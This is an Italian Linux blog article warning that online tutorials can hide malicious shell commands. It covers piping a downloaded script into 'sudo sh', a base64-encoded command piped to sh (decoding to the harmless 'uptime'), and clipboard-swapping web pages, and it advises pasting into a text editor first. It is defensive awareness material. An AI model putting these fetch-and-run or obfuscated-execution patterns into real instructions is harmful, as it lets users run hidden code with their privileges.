Tutorial malevoli e copypaste of doom: quando il malware, come le frasi non dette, si nasconde tra le righe

Code

Internet, abbiamo tutti notato, è piena di guide e tutorial, specialmente per il mondo open-source. Questa abbondanza ha sicuramente contraddistinto questi ultimi 2 decenni e la rivoluzione .com, oltre a creare un senso di community attorno ad applicativi e sistemi operativi, ci ha salvato da lunghe ore di troubleshooting e/o letture varie in giro per internet.

Azzarderemmo a dire che anche una grossa fetta dell’utenza Linux sarebbe probabilmente già ritornata a Windows senza l’abbondanza di guide online su come fare qualsiasi cosa e, elemento da non trascurare, anche gli utenti più stagionati perderebbero giornalmente molto più tempo a reinventare la ruota se la Community non permettesse di risparmiare tempo evitando di risolvere nuovamente problemi già risolti da altri, milioni di volte.

V’è sempre da ricordare, comunque, un fattore fondamentale spesso dimenticato dai più: sul web, chiunque può scrivere qualsiasi cosa e non tutti gli esseri umani sono mossi da spirito benevolo di comunanza.

Non stiamo parlando di quelle pagine riempite fino all’orlo di pubblicità varie e invasive: sebbene vi sia un posto speciale anche per quei webmaster, è facilmente comprensibile come un sito abbia dei costi di funzionamento da sostenere e, a meno di malvertising, non v’è un danno subito da chi legge.

Ciò che è imperdonabile, tuttavia, è – rullo di tamburi – l’inclusione di malware vero e proprio in tali guide e non ci stiamo riferendo a degli eseguibili da scaricare: sarebbe fin troppo ovvio e ci cascherebbero davvero in pochi, e, come abbiamo già visto, perché sforzarsi di creare un eseguibile binario quando la maggior parte di noi non ha né tempo né voglia di analizzare riga per riga gli script che in quel momento serve eseguire, magari per lavoro?

Se espressioni come:

curl http://sitoweb/script_a_caso_.sh | sudo sh

vi fanno rabbrividire, siete sulla buona strada e, probabilmente, le notereste immediatamente nel codice anche con una semplice occhiata.

Ci domandiamo, però, se vi farebbero lo stesso effetto comandi come:

echo dXB0aW1l | base64 -d | sh

Il quale nasconde, codificato in base64, il comando uptime. È innocuo, ma non era affatto apparente che sarebbe stato eseguito in quella riga di codice e, come s’intuisce, in quella stringa poteva nascondersi qualunque altro comando, incluso un rm ricorsivo su tutto il drive.

Ora, direte: basta semplicemente incollare solo i comandi che si comprendono appieno, no?

Contro ogni aspettativa, la risposta è no: vi avevamo già illustrato, tempo addietro, come delle pagine web malevole opportunamente confezionate possano mostrarvi un comando completamente innocuo come un ls -l ma, nel momento in cui lo copierete, il contenuto di ciò che avete copiato non sarà quello che avete appena letto.

Come dimostrato nell’articolo linkato, anche un banale CONTROL+C su un comando di pochi caratteri come quello appena mostrato può in realtà mettervi negli appunti uno script anche di centinaia o migliaia di righe.

Il danno, però, non si concretizza fino a che non avverrà il CONTROL+V, ovvero l’incollare il testo appena copiato in un terminale. Chiunque ci abbia provato conosce bene la comodità di copiare-incollare interi blocchi di comandi e, almeno su shell di default come bash e in mancanza di impostazioni personalizzate, essi verranno eseguito uno dopo l’altro in quanto ogni nuova riga è interpretata come un ENTER\INVIO.

Nel nostro caso, lo script verrebbe immediatamente eseguito appena lo incollerete in un terminale, con i privilegi che vi ritrovate in quel momento. Ciò potrebbe nuocere alla salute di quel PC, oltre che alla vostra. Un buon modo di proteggersi da questo attacco e incollare ciò che avete appena copiato dal web in un blocco note: ciò vi mostrerebbe in chiaro ciò che realmente è stato copiato e vi permetterebbe di cogliere eventuali attacchi del genere.

Scomodo? Si, ma mai quanto avere installato, voi stessi, una backdoor su un sistema di produzione, o l’aver accidentalmente fatto un rm ricorsivo su tutti i volumi montati.

Nonostante questo reminder, non possiamo non menzionare nuovamente come tutorial, wiki, guide e tutto ciò che è volto a farvi risparmiare tempo siano una benedizione e vi sono risorse come la Arch Wiki, tra le altre, che vi risparmiano anche lo sforzo di dover cercare altrove su Internet, su siti web che non sempre hanno a cuore i nostri migliori interessi.

Del resto, senza la condivisione della conoscenza, seppur con le dovute precauzioni e la sana paranoia e senso critico di chi poi legge, non vi è progresso.

41085de5a39ff3df665eb58d3f77b9a8?s=150&d=mp&r=g
John Toscano

Appassionato di Linux e della cultura open-source da vent’anni, continuo a fare del mio meglio per diffondere tale filosofia e soprattutto condividere la conoscenza.

C’è sempre qualcuno, laffuori, che sta avendo un problema che tu hai già risolto e, condividendo la soluzione, puoi fare la differenza.

Se quel qualcuno sei tu, chiedi pure alla community. La trovi ovunque, ad esempio su reddit.com/r/italyinformaticareddit.com/r/debianreddit.com/r/ubuntureddit.com/r/archlinuxreddit.com/r/linux, sui forum specifici delle distro come https://bbs.archlinux.org/ oppure puoi consultare direttamente le wiki, come ad esempio quella di Arch a https://wiki.archlinux.org/title/Table_of_contents.

Perchè nessun problema andrebbe risolto più di una volta.

Fonte: https://www.miamammausalinux.org/2022/11/tutorial-malevoli-e-copypaste-of-doom-quando-il-malware-come-le-frasi-non-dette-si-nasconde-tra-le-righe/

Visited 2 times, 1 visit(s) today
Se vuoi sostenerci, puoi farlo acquistando qualsiasi cosa dai diversi link di affiliazione che abbiamo nel nostro sito o partendo da qui oppure alcune di queste distribuzioni GNU/Linux che sono disponibili sul nostro negozio online, quelle mancanti possono essere comunque richieste, e su cui trovi anche PC, NAS e il ns ServerOne. Se ti senti generoso, puoi anche donarmi solo 1€ o più se vuoi con PayPal e aiutarmi a continuare a pubblicare più contenuti come questo. Grazie!

Hai dubbi o problemi? Ti aiutiamo noi!

Se vuoi rimanere sempre aggiornato, iscriviti al nostro canale Telegram.
Se vuoi ricevere supporto per qualsiasi dubbio o problema, iscriviti alla nostra community Facebook o gruppo Telegram.
Cosa ne pensi? Fateci sapere i vostri pensieri nei commenti qui sotto.
Ti piace quello che leggi? Per favore condividilo con gli altri.
Amazon Music
Scopri le ultime offerte per dischi ssd su Acquista su Amazon
Scopri le ultime offerte per memorie RAM DDR su Acquista su Amazon
Scopri le ultime offerte per Chromebook su Acquista su Amazon
Scopri le ultime offerte per Raspberry su Acquista su Amazon

Potrebbero interessarti anche...

Lascia un commento

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *

Questo sito usa Akismet per ridurre lo spam. Scopri come i tuoi dati vengono elaborati.